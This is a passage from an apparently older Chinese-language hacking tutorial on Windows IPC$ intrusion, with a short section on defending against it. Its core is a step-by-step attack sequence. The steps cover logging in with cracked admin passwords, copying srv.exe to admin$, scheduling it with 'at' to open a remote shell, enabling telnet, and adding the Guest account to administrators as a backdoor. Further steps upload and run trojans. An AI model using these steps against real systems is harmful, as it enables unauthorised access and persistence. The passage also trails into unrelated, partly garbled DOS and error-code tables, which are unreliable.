3)並不是說建立了ipc$連接就可以查看對方的用戶列表,因為管理員可以禁止導出用戶列表
三 建立ipc$連接在hack攻擊中的作用
就像上面所說的,即使你建立了一個空的連接,你也可以獲得不少的信息(而這些信息往往是入侵中必不可少的),訪問部分共享,如果你能夠以某一個具有
一定許可權的用戶身份登陸的話,那麼你就會得到相應的許可權,顯然,如果你以管理員身份登陸,嘿嘿,就不用我在多說了吧,what u want,u can do!!
(基本上可以總結為獲取目標信息、管理目標進程和服務,上傳木馬並運行,如果是2000server,還可以考慮開啟終端服務方便控制.怎麼樣?夠厲害吧!)
不過你也不要高興的太早,因為管理員的密碼不是那麼好搞到的,雖然會有一些傻傻的管理員用空口令或者弱智密碼,但這畢竟是少數,而且現在不比從前了,隨著人們安全意識的提高,管理員們也愈加小心了,得到管理員密碼會越來越難的:(
因此今後你最大的可能就是以極小的許可權甚至是沒有許可權進行連接,你會慢慢的發現ipc$連接並不是萬能的,甚至在主機不開啟ipc$共享時,你根本就無法連接.
所以我認為,你不要把ipc$入侵當作終極武器,不要認為它戰無不勝,它就像是足球場上射門前的傳球,很少會有致命一擊的效果,但卻是不可缺少的,我覺得這才是ipc$連接在hack入侵中的意義所在.
四 ipc$與空連接,139,445埠,默認共享的關系
以上四者的關系可能是菜鳥很困惑的一個問題,不過大部分文章都沒有進行特別的說明,其實我理解的也不是很透徹,都是在與大家交流中總結出來的.(一個有良好討論氛圍的BBS可以說是菜鳥的天堂)
1)ipc$與空連接:
不需要用戶名與密碼的ipc$連接即為空連接,一旦你以某個用戶或管理員的身份登陸(即以特定的用戶名和密碼進行ipc$連接),自然就不能叫做空連接了.
許多人可能要問了,既然可以空連接,那我以後就空連接好了,為什麼還要費九牛二虎之力去掃描弱口令,呵呵,原因前面提到過,當你以空連接登陸時,你沒有任何許可權(很郁悶吧),而你以用戶或管理員的身份登陸時,你就會有相應的許可權(有許可權誰不想呀,所以還是老老實實掃吧,不要偷懶喲).
2)ipc$與139,445埠:
ipc$連接可以實現遠程登陸及對默認共享的訪問;而139埠的開啟表示netbios協議的應用,我們可以通過139,445(win2000)埠實現對共享文件/列印機的訪問,因此一般來講,ipc$連接是需要139或445埠來支持的.
3)ipc$與默認共享
默認共享是為了方便管理員遠程管理而默認開啟的共享(你當然可以關閉它),即所有的邏輯盤(c$,d$,e$……)和系統目錄winnt或windows(admin$),我們通過ipc$連接可以實現對這些默認共享的訪問(前提是對方沒有關閉這些默認共享)
五 ipc$連接失敗的原因
以下5個原因是比較常見的:
1)你的系統不是NT或以上****作系統;
2)對方沒有打開ipc$默認共享
3)對方未開啟139或445埠(惑被防火牆屏蔽)
4)你的命令輸入有誤(比如缺少了空格等)
5)用戶名或密碼錯誤(空連接當然無所謂了)
另外,你也可以根據返回的錯誤號分析原因:
錯誤號5,拒絕訪問 : 很可能你使用的用戶不是管理員許可權的,先提升許可權;
錯誤號51,Windows 無法找到網路路徑 : 網路有問題;
錯誤號53,找不到網路路徑 : ip地址錯誤;目標未開機;目標lanmanserver服務未啟動;目標有防火牆(埠過濾);
錯誤號67,找不到網路名 : 你的lanmanworkstation服務未啟動;目標刪除了ipc$;
錯誤號1219,提供的憑據與已存在的憑據集沖突 : 你已經和對方建立了一個ipc$,請刪除再連。
錯誤號1326,未知的用戶名或錯誤密碼 : 原因很明顯了;
錯誤號1792,試圖登錄,但是網路登錄服務沒有啟動 : 目標NetLogon服務未啟動。(連接域控會出現此情況)
錯誤號2242,此用戶的密碼已經過期 : 目標有帳號策略,強制定期要求更改密碼。
關於ipc$連不上的問題比較復雜,除了以上的原因,還會有其他一些不確定因素,在此本人無法詳細而確定的說明,就*大家自己體會和試驗了.
<br>六 如何打開目標的IPC$(此段引自相關文章)
首先你需要獲得一個不依賴於ipc$的shell,比如sql的cmd擴展、telnet、木馬,當然,這shell必須是admin許可權的,然後你可以使用shell執行命令 net share ipc$ 來開放目標的ipc$。從上面可以知道,ipc$能否使用還有很多條件。請確認相關服務都已運行,沒有就啟動它(不知道怎麼做的請看net命令的用法),還是不行的話(比如有防火牆,殺不了)建議放棄。
七 如何防範ipc$入侵
1禁止空連接進行枚舉(此****作並不能阻止空連接的建立,引自《解剖win2000下的空會話》)
首先運行regedit,找到如下組建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的鍵值改為:00000001(如果設置為2的話,有一些問題會發生,比如一些WIN的服務出現問題等等)
2禁止默認共享
1)察看本地共享資源
運行-cmd-輸入net share
2)刪除共享(每次輸入一個)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以繼續刪除)
3)停止server服務
net stop server /y (重新啟動後server服務會重新開啟)
4)修改注冊表
運行-regedit
server版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的鍵值改為:00000000。
pro版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的鍵值改為:00000000。
如果上面所說的主鍵不存在,就新建(右擊-新建-雙位元組值)一個主健再改鍵值。
3永久關閉ipc$和默認共享依賴的服務:lanmanserver即server服務
控制面板-管理工具-服務-找到server服務(右擊)-屬性-常規-啟動類型-已禁用
4安裝防火牆(選中相關設置),或者埠過濾(濾掉139,445等),或者用新版本的優化大師
5設置復雜密碼,防止通過ipc$窮舉密碼
八 相關命令
1)建立空連接:
net use $">\\IP\ipc$ "" /user:"" (一定要注意:這一行命令中包含了3個空格)
2)建立非空連接:
net use $">\\IP\ipc$ "用戶名" /user:"密碼" (同樣有3個空格)
3)映射默認共享:
net use z: $">\\IP\c$ "密碼" /user:"用戶名" (即可將對方的c盤映射為自己的z盤,其他盤類推)
如果已經和目標建立了ipc$,則可以直接用IP+盤符+$訪問,具體命令 net use z: $">\\IP\c$
4)刪除一個ipc$連接
net&nbs
p;use $">\\IP\ipc$ /del
5)刪除共享映射
net use c: /del 刪除映射的c盤,其他盤類推
net use * /del 刪除全部,會有提示要求按y確認
九 經典入侵模式
這個入侵模式太經典了,大部分ipc教程都有介紹,我也就拿過來引用了,在此感謝原創作者!(不知道是哪位前輩)
11. C:\>net use $">\\127.0.0.1\IPC$ "密碼" /user:"用戶名"
一般用流光,通過掃描弱口令來得到,管理員帳號和密碼.
2. C:\> srv.exe $">\\127.0.0.1\admin$
先復制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復制到什麼地方去了)。
3. C:\>net time \\127.0.0.1
查查時間,發現127.0.0.1 的當前時間是 2004/6/15 上午 11:00,命令成功完成。
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令啟動srv.exe吧
5. C:\>net time \\127.0.0.1
再查查到時間沒有?如果127.0.0.1 的當前時間是 2004/6/15 上午 11:05,那就准備開始下面的命令。
6. C:\>telnet 127.0.0.1 99
這里會用到Telnet命令吧,注意埠是99。Telnet默認的是23埠,但是我們使用的是SRV在對方計算機中為我們建立一個99埠的Shell。
雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個Telnet服務!這就要用到ntlm了
7.C:\> ntlm.exe $">\\127.0.0.1\admin$
用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。
8. C:\WINNT\system32>ntlm
輸入ntlm啟動(這里的C:\WINNT\system32>指的是對方計算機,運行ntlm其實是讓這個程序在對方計算機上運行)。當出現"DONE"的時候,就說明已經啟動正常。然後使用"net start telnet"來開啟Telnet服務!
9. Telnet 127.0.0.1,接著輸入用戶名與密碼就進入對方了,****作就像在DOS上****作一樣簡單!(然後你想做什麼?想做什麼就做什麼吧,哈哈)
為了以防萬一,我們再把guest激活加到管理組
10. C:\>net user guest /active:yes
將對方的Guest用戶激活
11. C:\>net user guest 1234
將Guest的密碼改為1234,或者你要設定的密碼
12. C:\>net localgroup administrators guest /add
將Guest變為Administrator(如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這台計算機)
ipc$常見問題:
1,怎樣建立空連接,它有什麼用?
答:使用命令 net use \IPipc$ "" /user:"" 就可以簡單地和目標建立一個空連接(需要目標開放ipc$)。
對於NT,在默認安全設置下,藉助空連接可以列舉目標用戶、共享,訪問everyone許可權的共享,訪問小部分注冊表等,沒有什麼利用價值。對2000作用就更小了。而且實現也不方便,需藉助工具。
2.為什麼我連不上IPC$?
答:1.只有nt/2000/xp及以上系統才可以建立ipc$。如果你用的是98/me是沒有該功能的。
2.確認你的命令沒有打錯。正確的命令是: net use \目標IPipc$ "密碼" /user:"用戶名"
注意別多了或少了空格。當用戶名和密碼中不包含空格時兩邊的雙引號可以省略。空密碼用""表示。
3,根據返回的錯誤號分析原因:
錯誤號5,拒絕訪問 : 很可能你使用的用戶不是管理員許可權的,先提升許可權;
錯誤號51,Windows 無法找到網路路徑 : 網路有問題;
錯誤號53,找不到網路路徑 : ip地址錯誤;目標未開機;目標lanmanserver服務未啟動;目標有防火牆(埠過濾);
錯誤號67,找不到網路名 : 你的lanmanworkstation服務未啟動;目標刪除了ipc$;
錯誤號1219,提供的憑據與已存在的憑據集沖突 : 你已經和對方建立了一個ipc$,請刪除再連。
錯誤號1326,未知的用戶名或錯誤密碼 : 原因很明顯了;
錯誤號1792,試圖登錄,但是網路登錄服務沒有啟動 : 目標NetLogon服務未啟動。(連接域控會出現此情況)
錯誤號2242,此用戶的密碼已經過期 : 目標有帳號策略,強制定期要求更改密碼。
4,關於ipc$連不上的問題比較復雜,沒有總結出一個統一的認識,在肉雞上實驗有時會得出矛盾的結論,十分棘手。 而且知道了問題所在,如果沒有用其他辦法獲得shell,很多問題依然不能解決。
5,怎樣打開目標的IPC$?
答:首先你需要獲得一個不依賴於ipc$的shell,比如sql的cmd擴展、telnet、木馬。當然,這shell必須是admin許可權的。然後你可以使用shell執行命令 net share ipc$ 來開放目標的ipc$。從上一問題可以知道,ipc$能否使用還有很多條件。請確認相關服務都已運行,沒有就啟動它(不知道怎麼做的請看net命令的用法)。還是不行的話(比如有防火牆,殺不了)建議放棄。
6,怎樣映射和訪問默認共享?
答:使用命令 net use z: \目標IPc$ "密碼" /user:"用戶名" 將對方的c盤映射為自己的z盤,其他盤類推。
如果已經和目標建立了ipc$,則可以直接用IP加盤符加$訪問。比如 muma.exe \IPd$pathmuma.exe 。或者再映射也可以,只是不用用戶名和密碼了:net use y: \IPd$ 。然後 muma.exe y:pathmuma.exe 。當路徑中包含空格時,須用""將路徑全引住。
7,如何刪除映射和ipc$連接?
答:用命令 net use \IPipc$ /del 刪除和一個目標的ipc$連接。
用命令 net use z: /
del 刪除映射的z盤,其他盤類推。
用命令 net use * /del 刪除全部。會有提示要求按y確認。
8,連上ipc$然後我能做什麼?
答:能使用管理員許可權的帳號成功和目標連接ipc$,表示你可以和對方系統做深入「交流」了。你可以使用各種命令行方式的工具(比如pstools系列、Win2000SrvReskit、telnethack等)獲得目標信息、管理目標的進程和服務等。如果目標開放了默認共享(沒開你就幫他開),你就可以上傳木馬並運行。也可以用tftp、ftp的辦法上傳。像dwrcc、VNC、RemoteAdmin等工具(木馬)還具有直接控屏的功能。如果是2000server,還可以考慮開啟終端服務方便控制。這里提到的工具的使用,請看自帶的說明或相關教程。
9,怎樣防止別人用ips$和默認共享入侵我?
答:A、一種辦法是把ipc$和默認共享都刪除了。但重起後還會有。這就需要改注冊表。
1,先把已有的刪除
net share ipc$ /del
net share admin$ /del
net share c$ /del
…………(有幾個刪幾個)
2,禁止別人空連接
首先運行regedit,找到如下主鍵[HKEY_LOCAL_]把RestrictAnonymous(DWORD)的鍵值改為:00000002。
3,禁止自動打開默認共享
對於server版,找到如下主鍵[HKEY_LOCAL_]把AutoShareServer(DWORD)的鍵值改為:00000000。
對於pro版,則是[HKEY_LOCAL_]把AutoShareWks(DWORD)的鍵值改為:00000000。
如果上面所說的主鍵不存在,就新建一個再改鍵值。
B、另一種是關閉ipc$和默認共享依賴的服務(不推薦)
net stop lanmanserver
可能會有提示說,XXX服務也會關閉是否繼續。因為還有些次要的服務依賴於lanmanserver。一般情況按y繼續就可以了。
C、最簡單的辦法是設置復雜密碼,防止通過ipc$窮舉密碼。但如果你有其他漏洞,ipc$將為進一步入侵提供方便。
D、還有一個辦法就是裝防火牆,或者埠過濾
不常用DOS命令
diskcomp磁碟比較 append 設置非執行文件路徑
expand 還原DOS文件 fasthelp快速顯示幫助信息
fc 文件比較 interink啟動伺服器
setver 設置版本 intersvr啟動客戶機
subst 路徑替換 qbasic Basic集成環境
vsafe 防病毒 unformat恢復已格式化的磁碟
ver 顯示DOS版本號 smartdrv設置磁碟加速器
vol 顯示磁碟卷標號 lh 將程序裝入高端內存
ctty 改變控制設備 emm386 擴展內存管理
9. nbu報錯,代碼156,win32 2:系統找不到指定的文件,是什麼原因啊,怎麼解決啊
0X0000000 操作完成 0X0000001 不正確的函數 0X0000002 系統找不到指定的文件 0X0000003 系統找不到指定的路徑 0X0000004 系統無法打開文件 0X0000005 拒絕存取 0X0000006 無效的代碼 0X0000007 內存控制模塊已損壞 0X0000008 內存空間不足,無法處理這個指令 0X0000009 內存控制模塊位址無效 0X000000A 環境不正確 0X000000B 嘗試載入一個格式錯誤的程序 0X000000C 存取碼錯誤 0X000000D 資料錯誤 0X000000E 內存空間不夠,無法完成這項操作 0X000000F 系統找不到指定的硬碟 0X0000010 無法移除目錄 0X0000011 系統無法將文件移到其他的硬碟 0X0000012 沒有任何文件 0X0000019 找不到指定扇區或磁軌 0X000001A 指定的磁碟或磁片無法存取 0X000001B 磁碟找不到要求的裝置 0X000001C 列印機沒有紙 0X000001D 系統無法將資料寫入指定的磁碟 0X000001E 系統無法讀取指定的裝置 0X000001F 連接到系統的某個裝置沒有作用 0X0000021文件的一部分被鎖定,現在無法存取 0X0000024 開啟的分享文件數量太多 0X0000026 到達文件結尾 0X0000027 磁碟已滿 0X0000036 網路繁忙 0X000003B 網路發生意外的錯誤 0X0000043 網路名稱找不到 0X0000050 文件已經存在 0X0000052 無法建立目錄或文件 0X0000053 INT24失敗(什麼意思?還請高手指點站長一二) 0X000006B 因為代用的磁碟尚未插入,所以程序已經停止 0X000006C 磁碟正在使用中或被鎖定 0X000006F 文件名太長 0X0000070 硬碟空間不足 0X000007F 找不到指定的程序 0X000045B 系統正在關機 0X000045C 無法中止系統關機,因為沒有關機的動作在進行中 0X000046A 可用伺服器儲存空間不足 0X0000475 系統BIOS無法變更系統電源狀態 0X000047E 指定的程序需要新的windows版本 0X000047F 指定的程序不是windwos或ms-dos程序 0X0000480 指定的程序已經啟動,無法再啟動一次 0X0000481 指定的程序是為舊版的 windows所寫的 0X0000482 執行此應用程序所需的程序庫文件之一被損 0X0000483 沒有應用程序與此項操作的指定文件建立關聯 0X0000484 傳送指令到應用程序無效 0X00005A2 指定的裝置名稱無效 0X00005AA 系統資源不足,無法完成所要求的服務 0X00005AB系統資源不足,無法完成所要求的服務 0X00005AC系統資源不足,無法完成所要求的服務 110 0x006E 系統無法開啟指定的 裝置或檔案。 111 0x006F 檔名太長。 112 0x0070 磁碟空間不足。 113 0x0071 沒有可用的內部檔案識別字。 114 0x0072 目標內部檔案識別字不正確。 117 0x0075 由應用程式所執行的 IOCTL 呼叫 不正確。 118 0x0076 寫入驗證參數值不正確。 119 0x0077 系統不支援所要求的指令。 120 0x0078 此項功能僅在 Win32 模式有效。 121 0x0079 semaphore 超過逾時期間。 122 0x007A 傳到系統呼叫的資料區域 太小。 123 0x007B 檔名、目錄名稱或儲存體標?***語法錯?***。 124 0x007C 系統呼叫層次不正確。 125 0x007D 磁碟沒有設定標?***。 126 0x007E 找不到指定的模組。 127 0x007F 找不到指定的程序。 128 0x0080 沒有子行程可供等待。 129 0x0081 %1 這個應用程式無法在 Win32 模式下執行。 130 0x0082 Attempt to use a file handle to an open disk partition for an operation other than raw disk I/O. 131 0x0083 嘗試將檔案指標移至檔案開頭之前。 132 0x0084 無法在指定的裝置或檔案,設定檔案指標。 133 0x0085 JOIN 或 SUBST 指令 無法用於 內含事先結合過的磁碟機。 134 0x0086 嘗試在已經結合的磁碟機,使用 JOIN 或 SUBST 指令。 135 0x0087 嘗試在已經替換的磁碟機,使用 JOIN 或 SUBST 指令。 136 0x0088 系統嘗試刪除 未連結過的磁碟機的連結關系。 137 0x0089 系統嘗試刪除 未替換過的磁碟機的替換關系。 138 0x008A 系統嘗試將磁碟機結合到已經結合過之磁碟機的目錄。 139 0x008B 系統嘗試將磁碟機替換成已經替換過之磁碟機的目錄。 140 0x008C 系統嘗試將磁碟機替換成已經替換過之磁碟機的目錄。 141 0x008D 系統嘗試將磁碟機 SUBST 成已結合的磁碟機 目錄。 142 0x008E 系統此刻無法執行 JOIN 或 SUBST。 143 0x008F 系統無法將磁碟機結合或替換同一磁碟機下目錄。 144 0x0090 這個目錄不是根目錄的子目錄。 145 0x0091 目錄仍有資料。 146 0x0092 指定的路恕w經被替換過。 147 0x0093 資源不足,無法處理這項 指令。 148 0x0094 指定的路拿o時候無法使用。 149 0x0095 嘗試要結合或替換的磁碟機目錄,是已經替換過的的目標。 150 0x0096 CONFIG.SYS 檔未指定系統追蹤資訊,或是追蹤功能被取消。 151 0x0097 指定的 semaphore事件 DosMuxSemWait 數目不正確。 152 0x0098 DosMuxSemWait 沒有執行;設定太多的 semaphore。 153 0x0099 DosMuxSemWait 清單不正確。 154 0x009A 您所輸入的儲存媒體標 元長度限制。 155 0x009B 無法建立其他的執行緒。 156 0x009C 接收行程拒絕接受信號。 157 0x009D 區段已經被舍棄,無法被鎖定。 158 0x009E 區段已經解除鎖定。 159 0x009F 執行緒識別碼的位址不正確。 160 0x00A0 傳到 DosExecPgm 的引數字串不正確。 161 0x00A1 指定的路恕ㄔ蕭T。 162 0x00A2 信號等候處理。 164 0x00A4 系統無法建立執行緒。 167 0x00A7 無法鎖定檔案的部份范圍。 170 0x00AA 所要求的資源正在使用中。 173 0x00AD 取消范圍的鎖定要求不明顯。 174 0x00AE 檔案系統不支援自動變更鎖定類型。 180 0x00B4 系統發現不正確的區段號碼。 182 0x00B6 作業系統無法執行 %1。 183 0x00B7 檔案已存在,無法建立同一檔案。 186 0x00BA 傳送的旗號錯?***。 187 0x00BB 指定的系統旗號找不到。 188 0x00BC 作業系統無法執行 %1。 189 0x00BD 作業系統無法執行 %1。 190 0x00BE 作業系統無法執行 %1。 191 0x00BF 無法在 Win32 模式下執行 %1。 192 0x00C0 作業系統無法執行 %1。 193 0x00C1 %1 不是正確的 Win32 應用程式。 194 0x00C2 作業系統無法執行 %1。 195 0x00C3 作業系統無法執行 %1。 196 0x00C4 作業系統無法執行 這個應用程式。 197 0x00C5 作業系統目前無法執行 這個應用程式。 198 0x00C6 作業系統無法執行 %1。 199 0x00C7 作業系統無法執行 這個應用程式。 200 0x00C8 程式碼的區段不可以大於或等於 64KB。 201 0x00C9 作業系統無法執行 %1。 202 0x00CA 作業系統無法執行 %1。 203 0x00CB 系統找不到輸入的環境選項。 205 0x00CD 在指令子目錄下,沒有任何行程有信號副處理程式。 206 0x00CE 檔案名稱或副檔名太長。 207 0x00CF ring 2 堆襯洏峇丑C 208 0x00D0 輸入的通用檔名字元 * 或 ? 不正確, 或指定太多的通用檔名字元。 209 0x00D1 所傳送的信號不正確。 210 0x00D2 無法設定信號處理程式。 212 0x00D4 區段被鎖定,而且無法重新配置。 214 0x00D6 附加到此程式或動態連結模組的動態連結模組太多。 215 0x00D7 Can『t nest calls to LoadMole. 230 0x00E6 The pipe state is invalid. 231 0x00E7 所有的 pipe instances 都在忙碌中。 232 0x00E8 The pipe is being closed. 233 0x00E9 No process is on the other end of the pipe. 234 0x00EA 有更多可用的資料。 240 0x00F0 作業階段被取消。 254 0x00FE 指定的延伸屬性名稱無效。 255 0x00FF 延伸的屬性不一致。 259 0x0103 沒有可用的資料。 266 0x010A 無法使用 Copy API。 267 0x010B 目錄名稱錯?***。 275 0x0113 延伸屬性不適用於緩沖區。 276 0x0114 在外掛的檔案系統上的延伸屬性檔案已經毀損。 277 0x0115 延伸屬性表格檔滿。 278 0x0116 指定的延伸屬性代碼無效。 282 0x011A 外掛的這個檔案系統不支援延伸屬性。 288 0x0120 意圖釋放不屬於叫用者的 mutex。 298 0x012A semaphore 傳送次數過多。 299 0x012B 只完成 Read/WriteProcessMemory 的部份要求。 317 0x013D 系統找不到位於訊息檔 %2 中編號為 0x%1 的訊息。 487 0x01E7 嘗試存取無效的位址。 534 0x0216 運算結果超過 32 位元。 535 0x0217 通道的另一端有一個行程在接送資料。 536 0x0218 等候行程來開啟通道的另一端。 994 0x03E2 存取延伸的屬性被拒。 995 0x03E3 由於執行緒結束或應用程式要求,而異常終止 I/O 作業。 996 0x03E4 重讀?I/O 事件不是設定成通知狀態。 997 0x03E5 正在處理重讀?I/O 作業。 998 0x03E6 對記憶體位置的無效存取。 999 0x03E7 執行 inpage 作業發生錯?***。